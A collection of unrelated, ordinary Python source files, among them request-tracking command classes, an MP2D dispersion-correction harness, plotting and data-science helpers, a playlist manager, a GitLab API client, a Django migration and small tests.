self.timestamp = timestamp
self.request_id = request_id
self.span_id = span_id
self.tag = tag
self.value = value
def message(self):
return {
"TagSpan": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
"span_id": self.span_id,
"tag": self.tag,
"value": self.value,
}
}
class TagRequest(object):
__slots__ = ("timestamp", "request_id", "tag", "value")
def __init__(self, timestamp, request_id, tag, value):
self.timestamp = timestamp
self.request_id = request_id
self.tag = tag
self.value = value
def message(self):
return {
"TagRequest": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
"tag": self.tag,
"value": self.value,
}
}
class ApplicationEvent(object):
__slots__ = ("event_type", "event_value", "source", "timestamp")
def __init__(self, event_type, event_value, source, timestamp):
self.event_type = event_type
self.event_value = event_value
self.source = source
self.timestamp = timestamp
def message(self):
return {
"ApplicationEvent": {
"timestamp": self.timestamp.isoformat() + "Z",
"event_type": self.event_type,
"event_value": self.event_value,
"source": self.source,
}
}
class BatchCommand(object):
__slots__ = ("commands",)
def __init__(self, commands):
self.commands = commands
def message(self):
return {
"BatchCommand": {
"commands": [command.message() for command in self.commands]
}
}
@classmethod
def from_tracked_request(cls, request):
# The TrackedRequest must be finished
commands = []
commands.append(
StartRequest(timestamp=request.start_time, request_id=request.request_id)
)
for key, value in iteritems(request.tags):
commands.append(
TagRequest(
timestamp=request.start_time,
request_id=request.request_id,
tag=key,
value=value,
)
)
for span in request.complete_spans:
commands.append(
StartSpan(
timestamp=span.start_time,
request_id=span.request_id,
span_id=span.span_id,
parent=span.parent,
operation=span.operation,
)
)
for key, value in iteritems(span.tags):
commands.append(
TagSpan(
timestamp=span.start_time,
request_id=request.request_id,
span_id=span.span_id,
tag=key,
value=value,
)
)
commands.append(
StopSpan(
timestamp=span.end_time,
request_id=span.request_id,
span_id=span.span_id,
)
)
commands.append(
FinishRequest(timestamp=request.end_time, request_id=request.request_id)
)
return cls(commands)
| nilq/baby-python | python |
"""Compute dispersion correction using Greenwell & Beran's MP2D executable."""
import pprint
import re
import sys
from decimal import Decimal
from typing import Any, Dict, Optional, Tuple
import numpy as np
import qcelemental as qcel
from qcelemental.models import AtomicResult, Provenance
from qcelemental.util import safe_version, which
from ..exceptions import InputError, ResourceError, UnknownError
from ..util import execute
from . import empirical_dispersion_resources
from .model import ProgramHarness
pp = pprint.PrettyPrinter(width=120, compact=True, indent=1)
class MP2DHarness(ProgramHarness):
_defaults = {
"name": "MP2D",
"scratch": True,
"thread_safe": True,
"thread_parallel": False,
"node_parallel": False,
"managed_memory": False,
}
version_cache: Dict[str, str] = {}
class Config(ProgramHarness.Config):
pass
@staticmethod
def found(raise_error: bool = False) -> bool:
return which(
"mp2d",
return_bool=True,
raise_error=raise_error,
raise_msg="Please install via `conda install mp2d -c psi4`",
)
def get_version(self) -> str:
self.found(raise_error=True)
which_prog = which("mp2d")
if which_prog not in self.version_cache:
# Note: anything below v1.1 will return an input error message here. but that's fine as version compare evals to False.
command = [which_prog, "--version"]
import subprocess
proc = subprocess.run(command, stdout=subprocess.PIPE)
self.version_cache[which_prog] = safe_version(proc.stdout.decode("utf-8").strip())
return self.version_cache[which_prog]
def compute(self, input_model: "AtomicInput", config: "TaskConfig") -> "AtomicResult":
from ..testing import is_program_new_enough
self.found(raise_error=True)
if not is_program_new_enough("mp2d", "1.1"):
raise ResourceError(f"MP2D version '{self.get_version()}' too old. Please update to at least '1.1'.")
job_inputs = self.build_input(input_model, config)
success, dexe = self.execute(job_inputs)
if success:
dexe["outfiles"]["stdout"] = dexe["stdout"]
dexe["outfiles"]["stderr"] = dexe["stderr"]
output_model = self.parse_output(dexe["outfiles"], input_model)
else:
output_model = input_model
output_model["error"] = {"error_type": "execution_error", "error_message": dexe["stderr"]}
return output_model
def execute(
self, inputs: Dict[str, Any], *, extra_outfiles=None, extra_commands=None, scratch_name=None, timeout=None
) -> Tuple[bool, Dict]:
success, dexe = execute(
inputs["command"],
inputs["infiles"],
inputs["outfiles"],
scratch_messy=False,
scratch_directory=inputs["scratch_directory"],
)
return success, dexe
def build_input(
self, input_model: "AtomicInput", config: "TaskConfig", template: Optional[str] = None
) -> Dict[str, Any]:
# strip engine hint
mtd = input_model.model.method
if mtd.startswith("mp2d-"):
mtd = mtd[5:]
if input_model.driver.derivative_int() > 1:
raise InputError(f"Driver {input_model.driver} not implemented for MP2D.")
# temp until actual options object
input_model.extras["info"] = empirical_dispersion_resources.from_arrays(
name_hint=mtd,
level_hint=input_model.keywords.get("level_hint", None),
param_tweaks=input_model.keywords.get("params_tweaks", None),
dashcoeff_supplement=input_model.keywords.get("dashcoeff_supplement", None),
)
# Need 'real' field later and that's only guaranteed for molrec
molrec = qcel.molparse.from_schema(input_model.molecule.dict())
xyz = qcel.molparse.to_string(molrec, dtype="xyz", units="Angstrom", ghost_format="")
infiles = {"mp2d_geometry": xyz}
# jobrec['molecule']['real'] = molrec['real']
# env = {
# 'HOME': os.environ.get('HOME'),
# 'PATH': os.environ.get('PATH'),
# #'PATH': os.pathsep.join([os.path.abspath(x) for x in os.environ.get('PSIPATH', '').split(os.pathsep) if x != '']) + \
# # os.pathsep + os.environ.get('PATH'),
# #'LD_LIBRARY_PATH': os.environ.get('LD_LIBRARY_PATH'),
# }
command = ["mp2d", "mp2d_geometry"]
command.extend(
"""--TT_a1={a1} --TT_a2={a2} --rcut={rcut} --w={w} --s8={s8}""".format(
**input_model.extras["info"]["dashparams"]
).split()
)
if input_model.driver == "gradient":
command.append("--gradient")
return {
"command": command,
"infiles": infiles,
"outfiles": ["mp2d_gradient"],
"scratch_directory": config.scratch_directory,
"input_result": input_model.copy(deep=True),
}
def parse_output(self, outfiles: Dict[str, str], input_model: "AtomicInput") -> "AtomicResult":
stdout = outfiles.pop("stdout")
for fl, contents in outfiles.items():
if contents is not None:
# LOG text += f'\n MP2D scratch file {fl} has been read.\n'
pass
# parse energy output (could go further and break into UCHF, CKS)
real = np.array(input_model.molecule.real)
full_nat = real.shape[0]
real_nat = np.sum(real)
for ln in stdout.splitlines():
if re.match(" MP2D dispersion correction Eh", ln):
ene = Decimal(ln.split()[4])
elif re.match("Atomic Coordinates in Angstroms", ln):
break
else:
if not ((real_nat == 1) and (input_model.driver == "gradient")):
raise UnknownError("Unknown issue occured.")
# parse gradient output
if outfiles["mp2d_gradient"] is not None:
srealgrad = outfiles["mp2d_gradient"]
realgrad = np.fromstring(srealgrad, count=3 * real_nat, sep=" ").reshape((-1, 3))
if input_model.driver == "gradient":
ireal = np.argwhere(real).reshape((-1))
fullgrad = np.zeros((full_nat, 3))
try:
fullgrad[ireal, :] = realgrad
except NameError as exc:
raise UnknownError("Unsuccessful gradient collection.") from exc
qcvkey = input_model.extras["info"]["fctldash"].upper()
calcinfo = []
calcinfo.append(qcel.Datum("CURRENT ENERGY", "Eh", ene))
calcinfo.append(qcel.Datum("DISPERSION CORRECTION ENERGY", "Eh", ene))
calcinfo.append(qcel.Datum("2-BODY DISPERSION CORRECTION ENERGY", "Eh", ene))
if qcvkey:
calcinfo.append(qcel.Datum(f"{qcvkey} DISPERSION CORRECTION ENERGY", "Eh", ene))
if input_model.driver == "gradient":
calcinfo.append(qcel.Datum("CURRENT GRADIENT", "Eh/a0", fullgrad))
calcinfo.append(qcel.Datum("DISPERSION CORRECTION GRADIENT", "Eh/a0", fullgrad))
calcinfo.append(qcel.Datum("2-BODY DISPERSION CORRECTION GRADIENT", "Eh/a0", fullgrad))
if qcvkey:
calcinfo.append(qcel.Datum(f"{qcvkey} DISPERSION CORRECTION GRADIENT", "Eh/a0", fullgrad))
# LOGtext += qcel.datum.print_variables({info.label: info for info in calcinfo})
calcinfo = {info.label: info.data for info in calcinfo}
# calcinfo = qcel.util.unnp(calcinfo, flat=True)
# got to even out who needs plump/flat/Decimal/float/ndarray/list
# Decimal --> str preserves precision
calcinfo = {
k.upper(): str(v) if isinstance(v, Decimal) else v for k, v in qcel.util.unnp(calcinfo, flat=True).items()
}
# jobrec['properties'] = {"return_energy": ene}
# jobrec["molecule"]["real"] = list(jobrec["molecule"]["real"])
retres = calcinfo[f"CURRENT {input_model.driver.upper()}"]
if isinstance(retres, Decimal):
retres = float(retres)
elif isinstance(retres, np.ndarray):
retres = retres.ravel().tolist()
output_data = {
"extras": input_model.extras,
"properties": {},
"provenance": Provenance(
creator="MP2D", version=self.get_version(), routine=__name__ + "." + sys._getframe().f_code.co_name
),
"return_result": retres,
"stdout": stdout,
}
output_data["extras"]["local_keywords"] = input_model.extras["info"]
output_data["extras"]["qcvars"] = calcinfo
output_data["success"] = True
return AtomicResult(**{**input_model.dict(), **output_data})
| nilq/baby-python | python |
__all__ = ["partitionN"]
from partition import *
| nilq/baby-python | python |
# yellowbrick.utils.helpers
# Helper functions and generic utilities for use in Yellowbrick code.
#
# Author: Benjamin Bengfort <bbengfort@districtdatalabs.com>
# Created: Fri May 19 10:39:30 2017 -0700
#
# Copyright (C) 2017 District Data Labs
# For license information, see LICENSE.txt
#
# ID: helpers.py [79cd8cf] benjamin@bengfort.com $
"""
Helper functions and generic utilities for use in Yellowbrick code.
"""
##########################################################################
## Imports
##########################################################################
from __future__ import division
import re
import numpy as np
from sklearn.pipeline import Pipeline
from .types import is_estimator
from yellowbrick.exceptions import YellowbrickTypeError
##########################################################################
## Model and Feature Information
##########################################################################
def get_model_name(model):
"""
Detects the model name for a Scikit-Learn model or pipeline.
Parameters
----------
model: class or instance
The object to determine the name for. If the model is an estimator it
returns the class name; if it is a Pipeline it returns the class name
of the final transformer or estimator in the Pipeline.
Returns
-------
name : string
The name of the model or pipeline.
"""
if not is_estimator(model):
raise YellowbrickTypeError(
"Cannot detect the model name for non estimator: '{}'".format(
type(model)
)
)
else:
if isinstance(model, Pipeline):
return get_model_name(model.steps[-1][-1])
else:
return model.__class__.__name__
def has_ndarray_int_columns(features, X):
""" Checks if numeric feature columns exist in ndarray """
_, ncols = X.shape
if not all(d.isdigit() for d in features if isinstance(d, str)) or not isinstance(X, np.ndarray):
return False
ndarray_columns = np.arange(0, ncols)
feature_cols = np.unique([int(d) for d in features])
return all(np.in1d(feature_cols, ndarray_columns))
# Alias for closer name to isinstance and issubclass
hasndarrayintcolumns = has_ndarray_int_columns
def is_monotonic(a, increasing=True):
"""
Tests whether a vector a has monotonicity.
Parameters
----------
a : array-like
Array that should be tested for monotonicity
increasing : bool, default: True
Test if the array is montonically increasing, otherwise test if the
array is montonically decreasing.
"""
a = np.asarray(a) # ensure a is array-like
if a.ndim > 1:
raise ValueError("not supported for multi-dimensonal arrays")
if len(a) <= 1:
return True
if increasing:
return np.all(a[1:] >= a[:-1], axis=0)
return np.all(a[1:] <= a[:-1], axis=0)
##########################################################################
## Numeric Computations
##########################################################################
#From here: http://stackoverflow.com/questions/26248654/numpy-return-0-with-divide-by-zero
def div_safe( numerator, denominator ):
"""
Ufunc-extension that returns 0 instead of nan when dividing numpy arrays
Parameters
----------
numerator: array-like
denominator: scalar or array-like that can be validly divided by the numerator
returns a numpy array
example: div_safe( [-1, 0, 1], 0 ) == [0, 0, 0]
"""
#First handle scalars
if np.isscalar(numerator):
raise ValueError("div_safe should only be used with an array-like numerator")
#Then numpy arrays
try:
with np.errstate(divide='ignore', invalid='ignore'):
result = np.true_divide( numerator, denominator )
result[ ~ np.isfinite( result )] = 0 # -inf inf NaN
return result
except ValueError as e:
raise e
def prop_to_size(vals, mi=0.0, ma=5.0, power=0.5, log=False):
"""
Converts an array of property values (e.g. a metric or score) to values
that are more useful for marker sizes, line widths, or other visual
sizes. The new sizes are computed as:
y = mi + (ma -mi)(\frac{x_i - min(x){max(x) - min(x)})^{power}
If ``log=True``, the natural logarithm of the property values is used instead.
Parameters
----------
prop : array-like, 1D
An array of values of the property to scale between the size range.
mi : float, default: 0.0
The size to assign the smallest property (minimum size value).
ma : float, default: 5.0
The size to assign the largest property (maximum size value).
power : float, default: 0.5
Used to control how rapidly the size increases from smallest to largest.
log : bool, default: False
Use the natural logarithm to compute the property sizes
Returns
-------
sizes : array, 1D
The new size values, in the same shape as the input prop array
"""
# ensure that prop is an array
vals = np.asarray(vals)
# apply natural log if specified
if log:
vals = np.log(vals)
# avoid division by zero error
delta = vals.max() - vals.min()
if delta == 0.0:
delta = 1.0
return mi + (ma-mi) * ((vals -vals.min()) / delta) ** power
##########################################################################
## String Computations
##########################################################################
def slugify(text):
"""
Returns a slug of given text, normalizing unicode data for file-safe
strings. Used for deciding where to write images to disk.
Parameters
----------
text : string
The string to slugify
Returns
-------
slug : string
A normalized slug representation of the text
.. seealso:: http://yashchandra.com/2014/05/08/how-to-generate-clean-url-or-a-slug-in-python/
"""
slug = re.sub(r'[^\w]+', ' ', text)
slug = "-".join(slug.lower().strip().split())
return slug
| nilq/baby-python | python |
import os
import random
class Playlist:
# maintains individual playlist
def __init__(self, path):
self.path = path
self.clips = []
n = os.path.basename(self.path).split(".")[:-1]
self.name = ".".join(n)
self.desc = ""
def load(self):
# each line has the format: "card_no, clip_name"
# line starting with a hash (#) is part of the description
with open(self.path) as pl:
for line in pl:
line = line.strip()
if line.startswith("#"):
self.desc += line.strip('#')
continue
if line == "":
continue
if "," in line:
line = line.split(",")
idx = line[0].strip()
cl = line[1].strip()
self.clips.append((idx, cl))
else:
print("Unknown line format in {}".format(self.path))
def delete(self):
os.remove(self.path)
def rename(self, name):
new = os.path.join(os.path.dirname(self.path), name)
os.rename(self.path, new)
self.path = new
n = name.split(".")[:-1]
self.name = ".".join(n)
def save(self):
with open(self.path, 'w+') as pl:
desc = self.desc.replace("\n", "\n#")
pl.write("#{}\n\n".format(desc))
for item in self.clips:
idx, cl = item
pl.write("{}, {}\n".format(idx, cl))
def addClip(self, idx, clip):
self.clips.append((idx, clip))
def removeClipAt(self, idx):
# remove clip at the specified position of the clip list
del self.clips[idx-1]
def removeClip(self, cardid, clipname):
# remove clip using card no and clip name
try:
idx = self.clips.index((cardid, clipname))
except ValueError:
# this shouldn't happen, perhaps we should
# raise a warning?
return
else: del self.clips[idx]
def shuffle(self):
random.shuffle(self.clips)
class PlaylistContainer:
# maintains all the playlists
def __init__(self, directory=None):
self.listdir = directory
self.playlist_extension = ".pl"
self.lists = []
def load(self, directory=None):
if directory:
self.listdir = directory
if self.listdir is None:
raise ValueError("Playlist directory is not set.")
if not os.path.isdir(self.listdir):
os.mkdir(self.listdir)
for f in os.listdir(self.listdir):
if f.endswith(self.playlist_extension):
hnd = Playlist(os.path.join(self.listdir, f))
hnd.load()
self.lists.append(hnd)
def getIdByName(self, name):
for i, l in enumerate(self.lists):
if name == l.name:
return i
return None
def getIdByPath(self, path):
for i, l in enumerate(self.lists):
if path == l.path:
return i
return None
def create(self, name):
if not name.endswith(self.playlist_extension):
name += self.playlist_extension
hnd = Playlist(os.path.join(self.listdir, name))
hnd.save()
self.lists.append(hnd)
return hnd
def rename(self, playlistid, name):
if not name.endswith(self.playlist_extension):
name += self.playlist_extension
self.lists[playlistid].rename(name)
def addClip(self, playlistid, cardid, clipname):
self.lists[playlistid].addClip(cardid, clipname)
def name(self, playlistid):
return self.lists[playlistid].name
def getDesc(self, playlistid):
return self.lists[playlistid].desc
def setDesc(self, playlistid, d):
self.lists[playlistid].desc = d
self.lists[playlistid].save()
def clips(self, playlistid):
return self.lists[playlistid].clips
def save(self, playlistid=None):
# if no playlist id is given, save all
if playlistid is None:
for l in self.lists:
l.save()
else:
self.lists[playlistid].save()
def removeClip(self, playlistid, cardid, name):
self.lists[playlistid].removeClip(cardid, name)
self.save(playlistid)
def remove(self, playlistid):
self.lists[playlistid].delete()
del self.lists[playlistid]
def count(self, playlistid=None):
# if playlist id is given, return clips count of it
# if no playlist id is given, return playlists count
if playlistid is None:
return len(self.lists)
else:
return len(self.lists[playlistid].clips)
def updateOrder(self, playlistid, newlist):
# sanity check
if len(newlist) != self.count(playlistid):
print("Playlist UO: length mismatch.")
return False
for newitem in newlist:
if newitem not in self.lists[playlistid].clips:
print("Playlist UO: {} not in {}".format(newitem, self.name(playlistid)))
return False
self.lists[playlistid].clips = newlist
self.save(playlistid)
return True
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
# Copyright (C) SME Virtual Network contributors. All rights reserved.
# See LICENSE in the project root for license information.
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 6 14:07:32 2020
"""
from netCDF4 import Dataset
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
data = Dataset(r"C:\Users\Jiacheng Li\Desktop\Study\University of Birmingham Relevant\Final Year Project\NetCDF_Handling\NetCDF_data\1980.nc", "r")
lats = data.variables["lat"][:]
lons = data.variables["lon"][:]
time = data.variables["time"][:]
tave = data.variables["tave"][:]
mp = Basemap(projection = "merc",
llcrnrlon = 65.8,
llcrnrlat = -2,
urcrnrlon = 145.37,
urcrnrlat = 38.78,
resolution = "i")
lon, lat = np.meshgrid(lons, lats)
x, y = mp(lon, lat)
colorMap = mp.pcolor(x, y, np.squeeze(tave[0,:,:]), cmap = "rainbow")
mp.drawcoastlines()
mp.drawstates()
mp.drawcountries()
char = mp.colorbar(colorMap, location = "right", pad = "10%")
plt.title("Average Temparature on 01-01-1980")
plt.show()
| nilq/baby-python | python |
from __future__ import absolute_import
from requests.exceptions import HTTPError
from six.moves.urllib.parse import quote
from sentry.http import build_session
from sentry_plugins.exceptions import ApiError
class GitLabClient(object):
def __init__(self, url, token):
self.url = url
self.token = token
def request(self, method, path, data=None, params=None):
headers = {
'Private-Token': self.token,
}
session = build_session()
try:
resp = getattr(session, method.lower())(
url='{}/api/v3/{}'.format(self.url, path.lstrip('/')),
headers=headers,
json=data,
params=params,
allow_redirects=False,
)
resp.raise_for_status()
except HTTPError as e:
raise ApiError.from_response(e.response)
return resp.json()
def auth(self):
return self.request('GET', '/user')
def get_project(self, repo):
return self.request('GET', '/projects/{}'.format(quote(repo, safe='')))
def get_issue(self, repo, issue_id):
try:
return self.request(
'GET',
'/projects/{}/issues'.format(
quote(repo, safe=''),
),
params={
# XXX(dcramer): this is an undocumented API
'iid': issue_id,
}
)[0]
except IndexError:
raise ApiError('Issue not found with ID', 404)
def create_issue(self, repo, data):
return self.request(
'POST',
'/projects/{}/issues'.format(quote(repo, safe='')),
data=data,
)
def create_note(self, repo, global_issue_id, data):
return self.request(
'POST',
'/projects/{}/issues/{}/notes'.format(
quote(repo, safe=''),
global_issue_id,
),
data=data,
)
def list_project_members(self, repo):
return self.request(
'GET',
'/projects/{}/members'.format(quote(repo, safe='')),
)
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-06 04:34
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
replaces = [(b'coding', '0001_initial'), (b'coding', '0002_auto_20160506_0424'), (b'coding', '0003_auto_20160506_0427')]
initial = True
dependencies = [
('main', '0001_squashed_0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Assignment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, null=True)),
('deleted_date', models.DateTimeField(blank=True, null=True)),
('name', models.CharField(max_length=64)),
('description', models.TextField(blank=True, null=True)),
('assigned_comments', models.ManyToManyField(blank=True, to=b'main.Comment')),
('assigned_submissions', models.ManyToManyField(blank=True, to=b'main.Submission')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Code',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, null=True)),
('deleted_date', models.DateTimeField(blank=True, null=True)),
('name', models.CharField(max_length=64)),
('description', models.TextField(blank=True, null=True)),
('css_class', models.CharField(blank=True, max_length=64, null=True)),
('key', models.CharField(blank=True, max_length=1, null=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='code_created_by', to=settings.AUTH_USER_MODEL)),
('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='code_deleted_by', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='code_modified_by', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CodeScheme',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, null=True)),
('deleted_date', models.DateTimeField(blank=True, null=True)),
('name', models.CharField(max_length=64)),
('description', models.TextField()),
('mutually_exclusive', models.BooleanField(default=False)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='codescheme_created_by', to=settings.AUTH_USER_MODEL)),
('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='codescheme_deleted_by', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='codescheme_modified_by', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CommentCodeInstance',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, null=True)),
('deleted_date', models.DateTimeField(blank=True, null=True)),
('assignment', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='coding.Assignment')),
('code', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='coding.Code')),
('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Comment')),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='commentcodeinstance_created_by', to=settings.AUTH_USER_MODEL)),
('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='commentcodeinstance_deleted_by', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='commentcodeinstance_modified_by', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='SubmissionCodeInstance',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, null=True)),
('deleted_date', models.DateTimeField(blank=True, null=True)),
('assignment', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='coding.Assignment')),
('code', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='coding.Code')),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submissioncodeinstance_created_by', to=settings.AUTH_USER_MODEL)),
('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submissioncodeinstance_deleted_by', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submissioncodeinstance_modified_by', to=settings.AUTH_USER_MODEL)),
('submission', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Submission')),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='code',
name='scheme',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='coding.CodeScheme'),
),
migrations.AddField(
model_name='assignment',
name='code_schemes',
field=models.ManyToManyField(to=b'coding.CodeScheme'),
),
migrations.AddField(
model_name='assignment',
name='coder',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='assignment',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='assignment_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='assignment',
name='deleted_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='assignment_deleted_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='assignment',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='assignment_modified_by', to=settings.AUTH_USER_MODEL),
),
]
| nilq/baby-python | python |
import json
from nebulo.sql.reflection.function import reflect_functions
from sqlalchemy.dialects.postgresql import base as pg_base
CREATE_FUNCTION = """
create table account(
id int primary key,
name text
);
insert into account (id, name)
values (1, 'oli');
create function get_account(id int)
returns account
as $$
select (1, 'oli')::account;
$$ language sql;
"""
def test_reflect_function_returning_row(engine, session):
session.execute(CREATE_FUNCTION)
session.commit()
functions = reflect_functions(engine, schema="public", type_map=pg_base.ischema_names)
get_account = functions[0]
res = session.execute(get_account.to_executable([1])).first()
print(res)
# psycopg2 does not know how to deserialize row results
assert res == ("(1,oli)",)
def test_integration_function(client_builder):
client = client_builder(CREATE_FUNCTION)
query = """
mutation {
getAccount(input: {id: 1, clientMutationId: "abcdef"}) {
cmi: clientMutationId
out: result {
nodeId
id
}
}
}
"""
with client:
resp = client.post("/", json={"query": query})
result = json.loads(resp.text)
print(result)
assert resp.status_code == 200
assert result["errors"] == []
assert result["data"]["getAccount"]["out"]["id"] == 1
assert result["data"]["getAccount"]["out"]["nodeId"] is not None
assert result["data"]["getAccount"]["cmi"] == "abcdef"
| nilq/baby-python | python |
# code modified from https://stackoverflow.com/questions/38401099/how-to-count-one-specific-word-in-python/38401167
import re
filename = input('Enter file:') # you can input any .txt file here. you need to type the path to the file.
# you can try the file in this folder: text_diamond.txt
handle = open(filename, 'r')
counts = dict()
for word in handle.read().split():
if word not in counts:
counts[word] = 1
else:
counts[word] += 1
print(counts)
# print only the count for my_word instead of iterating over entire dictionary
#my_word = "Shine"
# print(my_word, counts[my_word])
| nilq/baby-python | python |
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='store-home-page'),
path('login/', views.login, name='login-page'),
path('signup/', views.signup, name='signup-page'),
]
| nilq/baby-python | python |
N = int(input())
X = list(map(int,input().split()))
menor = X[0]
pos = 0
for k in range(1,N):
if X[k] < menor:
menor = X[k]
pos = k
print("Menor valor: %d" % (menor))
print("Posicao: %d" % (pos))
| nilq/baby-python | python |
"""
Utilities Tests
---------------
"""
from poli_sci_kit import utils
def test_normalize():
assert sum(utils.normalize([1, 2, 3, 4, 5])) == 1.0
def test_gen_list_of_lists():
test_list = [0, 1, 2, 3, 4, 5, 6, 7, 8]
assert utils.gen_list_of_lists(
original_list=test_list, new_structure=[3, 3, 3]
) == [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
def test_gen_faction_groups():
test_list = ["a", "b", "c", "d", "e", "f"]
assert utils.gen_faction_groups(
original_list=test_list, factions_indexes=[[0, 1, 5], [2, 3, 4]]
) == [["a", "b", "f"], ["c", "d", "e",]]
def test_semiscirled_parl_plot(allocations):
assert list(
utils.gen_parl_points(
allocations=allocations, style="semicircle", num_rows=2, speaker=False,
)["row"]
) == [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
assert list(
utils.gen_parl_points(
allocations=allocations, style="semicircle", num_rows=2, speaker=False,
)["row_position"]
) == [0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
test_df = utils.gen_parl_points(
allocations=allocations, style="semicircle", num_rows=2, speaker=True,
)
assert test_df["x_loc"][len(test_df) - 1] == 0
assert test_df["y_loc"][len(test_df) - 1] == 0
def test_rectangle_parl_plot(allocations):
assert list(
utils.gen_parl_points(
allocations=allocations, style="rectangle", num_rows=4, speaker=False,
)["row"]
) == [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3]
assert list(
utils.gen_parl_points(
allocations=allocations, style="rectangle", num_rows=4, speaker=False,
)["row_position"]
) == [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4]
test_df = utils.gen_parl_points(
allocations=allocations, style="rectangle", num_rows=4, speaker=True,
)
assert test_df["x_loc"][len(test_df) - 1] == 0
assert test_df["y_loc"][len(test_df) - 1] == 4
def test_swap_parl_allocations(allocations):
test_df = utils.gen_parl_points(
allocations=allocations, style="rectangle", num_rows=4, speaker=False,
)
test_swap_df = test_df.copy()
utils.swap_parl_allocations(df=test_swap_df, row_0=0, pos_0=0, row_1=0, pos_1=1)
assert test_df["group"][0] == test_swap_df["group"][1]
def test_hex_to_rgb():
assert utils.hex_to_rgb("#ffffff").get_value_tuple() == (1.0, 1.0, 1.0)
def test_rgb_to_hex():
assert utils.rgb_to_hex((1.0, 1.0, 1.0)) == "#ffffff"
def test_scale_saturation():
assert utils.scale_saturation((1, 1, 1), 0.95) == (0.95, 0.95, 0.95)
| nilq/baby-python | python |
from tark import constants
class DBSettings(object):
def __init__(self,
db_type=constants.DEFAULT_DB_TYPE,
db_name=constants.DEFAULT_DB_NAME,
db_user=constants.DEFAULT_DB_USER,
db_password=constants.DEFAULT_DB_PASSWORD,
db_node=constants.DEFAULT_DB_NODE,
**kwargs):
self.db_type = db_type
self.db_name = db_name
# db specific config parameters
self.db_user = db_user
self.db_password = db_password
self.db_node = db_node
self.db_configuration = dict()
if self.db_user is not None:
